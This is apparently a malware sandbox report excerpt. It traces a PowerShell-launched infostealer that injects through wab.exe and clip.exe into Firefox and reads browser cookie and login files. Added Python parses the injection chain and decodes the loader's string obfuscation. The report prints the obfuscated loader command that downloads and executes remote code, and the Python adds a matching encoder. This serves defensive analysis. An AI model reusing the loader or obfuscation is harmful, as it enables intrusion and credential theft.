          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtCreateFile: Direct from: 0x76EF2FEC
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtOpenFile: Direct from: 0x76EF2DCC
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtCreateMutant: Direct from: 0x76EF35CC
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtResumeThread: Direct from: 0x76EF36AC
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtProtectVirtualMemory: Direct from: 0x76EE7B2E
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtReadFile: Direct from: 0x76EF2ADC
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtDelayExecution: Direct from: 0x76EF2DDC
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtResumeThread: Direct from: 0x76EF2FBC
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtCreateUserProcess: Direct from: 0x76EF371C
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtSetInformationThread: Direct from: 0x76EE63F9
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtClose: Direct from: 0x76EF2B6C
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtCreateKey: Direct from: 0x76EF2C6C
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: NULL target: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe protection: execute and read and write
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe protection: read write
          Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
          Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\clip.exe | Thread APC queued: target process: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2C00000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 28DFF40
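          The "Memory written", "Section loaded" and "Thread APC queued" rows above record how control moves between processes: powershell.exe writes into wab.exe, wab.exe maps execute-read-write sections into nPzDKsDmTWqJ.exe and clip.exe, and clip.exe maps into firefox.exe and queues an APC. The Python below is an added example, not part of this report or of any Joe Sandbox tooling, that parses rows of this shape into a cross-process write graph and reports the root-to-leaf injection chains and the processes that received executable memory. The sample rows are constructed for the example from the entries above, with the fields separated by single spaces.

```python
import re
from collections import defaultdict

# Rows constructed for this example, modelled on the "Memory written",
# "Section loaded" and "Thread APC queued" entries above, with single spaces
# between the fields. The last row is not an injection row and is skipped.
SAMPLE_ROWS = [
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2C00000",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe protection: execute and read and write",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write",
    r"Source: C:\Windows\SysWOW64\clip.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write",
    r"Source: C:\Windows\SysWOW64\clip.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write",
    r"Source: C:\Windows\SysWOW64\clip.exe Thread APC queued: target process: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe",
    r"Source: C:\Windows\SysWOW64\clip.exe Queries volume information: C:\ VolumeInformation",
]

# One regex for the three row kinds; the optional tail carries either the
# protection of a mapped section or the base address of a memory write.
ROW = re.compile(
    r"^Source: (?P<src>.+?) "
    r"(?P<kind>Memory written|Section loaded|Thread APC queued): "
    r"(?:NULL target: |target process: )?"
    r"(?P<dst>.+?)"
    r"(?: protection: (?P<prot>.+)| base: (?P<base>[0-9A-Fa-f]+))?$"
)


def basename(path):
    return path.rsplit("\\", 1)[-1]


def parse_rows(rows):
    """Turn report rows into (source, target, kind, rwx) injection events."""
    events = []
    for row in rows:
        m = ROW.match(row)
        if m is None:
            continue  # rows of other kinds carry no cross-process write
        events.append({
            "src": basename(m["src"]),
            "dst": basename(m["dst"]),
            "kind": m["kind"],
            # "execute and read and write" is the RWX mapping a loader needs
            "rwx": (m["prot"] or "").startswith("execute"),
        })
    return events


def rwx_targets(events):
    """Processes that received an executable mapping from another process."""
    return {e["dst"] for e in events if e["rwx"]}


def injection_chains(events):
    """Every root-to-leaf path through the cross-process write graph."""
    edges = defaultdict(set)
    targets = set()
    for e in events:
        edges[e["src"]].add(e["dst"])
        targets.add(e["dst"])
    roots = [s for s in edges if s not in targets]
    chains = []

    def walk(node, path):
        if node in path:          # two processes writing into each other
            return
        path = path + [node]
        if not edges.get(node):   # leaf: nothing was injected from here
            chains.append(path)
            return
        for nxt in sorted(edges[node]):
            walk(nxt, path)

    for root in roots:
        walk(root, [])
    return sorted(chains)


if __name__ == "__main__":
    evts = parse_rows(SAMPLE_ROWS)
    print("RWX targets:", sorted(rwx_targets(evts)))
    for chain in injection_chains(evts):
        print(" -> ".join(chain))
```

          Run on the constructed rows this reports powershell.exe as the only root and firefox.exe and nPzDKsDmTWqJ.exe as the leaves, which is the chain a responder wants before pulling memory: the stealer code ends up in firefox.exe even though nothing on disk was written there, and clip.exe (a signed clipboard utility) is only a hop.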
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. 
          g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePan
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. 
          g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
          Source: C:\Windows\SysWOW64\clip.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
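          Every string in the powershell.exe command lines above goes through one helper, Antikvitetsforretnings: it walks its argument from index 4 in steps of 5 and keeps a substring of length $Cabalismsbryderens, which is 0 until `${host}.CurrentCulture` is non-null and is then incremented to 1, so every fifth character is payload and the other four are filler. The loop bound is length minus that width, so the final group (which always ends in a space here) is dropped. The Python below is an added example, not code from the report or from the loader, that re-implements the scheme and adds a hypothetical `encode` for generating test input. The three encoded strings are copied from the command line above; only the first twelve groups of the Mozilla string are used because the rendered report collapsed runs of spaces further along, which shifts the alignment the scheme depends on. The filler alphabet in `encode` and the round-trip plaintext are constructed for the example.

```python
import random
import string

# Strings copied verbatim from the powershell.exe command line in the report.
PAGE_SAMPLES = {
    "Antoninas_prefix": "DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc ",
    "Torumslejligheds": "BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ",
    "Eksperter": "GuttiVirke,trexScor ",
}


def decode(blob, first=4, stride=5, width=1):
    """Mirror of the loader's Antikvitetsforretnings function.

    Takes blob[i:i+width] for i = first, first+stride, ... while i < len(blob)-width.
    width is $Cabalismsbryderens: 0 unless ${host}.CurrentCulture is non-null,
    in which case it is incremented to 1, so a host with no culture decodes nothing.
    """
    limit = len(blob) - width
    out = []
    i = first
    while i < limit:
        out.append(blob[i:i + width])
        i += stride
    return "".join(out)


def encode(plain, stride=5, seed=0):
    """Inverse of decode(); a hypothetical generator used only to build test input.

    Each plaintext character is preceded by stride-1 filler characters and one
    trailing filler group ending in a space is appended, so that decode()'s
    len-width bound drops that last group exactly as the loader's loop does.
    """
    rng = random.Random(seed)
    alphabet = string.ascii_letters + ",."  # filler alphabet chosen for this example

    def filler():
        return "".join(rng.choice(alphabet) for _ in range(stride - 1))

    groups = [filler() + ch for ch in plain]
    groups.append(filler() + " ")
    return "".join(groups)


def decode_samples(samples=PAGE_SAMPLES):
    """Decode every sample with the width the loader uses on a normal host."""
    return {name: decode(blob) for name, blob in samples.items()}


if __name__ == "__main__":
    for name, value in decode_samples().items():
        print(f"{name:18} -> {value!r}")
    print("no-culture host    ->", repr(decode(PAGE_SAMPLES["Eksperter"], width=0)))
    round_trip = "echo %appdata% && echo t"  # constructed plaintext
    print("round trip ok      ->", decode(encode(round_trip)) == round_trip)
```

          $Eksperter decodes to `iex`, which is what the Unthrust wrapper dot-sources each decoded stage through, $Torumslejligheds to `User-Agent`, and $Antoninas starts with `Mozilla/5.0`; the same function recovers the download URL held in $nucleli from the full command line. The CurrentCulture test is the only host check in this stage: with width 0 every decoded string is empty and nothing runs, which is worth remembering when replaying the script in a stripped-down PowerShell host.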
          Source: nPzDKsDmTWqJ.exe, 0000000D.00000000.2717316252.0000000001881000.00000002.00000001.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000D.00000002.3287884979.0000000001881000.00000002.00000001.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000002.3287883261.00000000019C1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
          Source: nPzDKsDmTWqJ.exe, 0000000D.00000000.2717316252.0000000001881000.00000002.00000001.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000D.00000002.3287884979.0000000001881000.00000002.00000001.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000002.3287883261.00000000019C1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: nPzDKsDmTWqJ.exe, 0000000D.00000000.2717316252.0000000001881000.00000002.00000001.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000D.00000002.3287884979.0000000001881000.00000002.00000001.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000002.3287883261.00000000019C1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: nPzDKsDmTWqJ.exe, 0000000D.00000000.2717316252.0000000001881000.00000002.00000001.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000D.00000002.3287884979.0000000001881000.00000002.00000001.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000002.3287883261.00000000019C1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

          Stealing of Sensitive Information

          Source: Yara match | File source: 0000000A.00000002.2791447025.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.3034416950.0000000004020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.3289574543.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.3034142738.0000000002740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.2819135013.0000000022090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\clip.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

          Remote Access Functionality

          Source: Yara match | File source: 0000000A.00000002.2791447025.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.3034416950.0000000004020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.3289574543.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.3034142738.0000000002740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.2819135013.0000000022090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
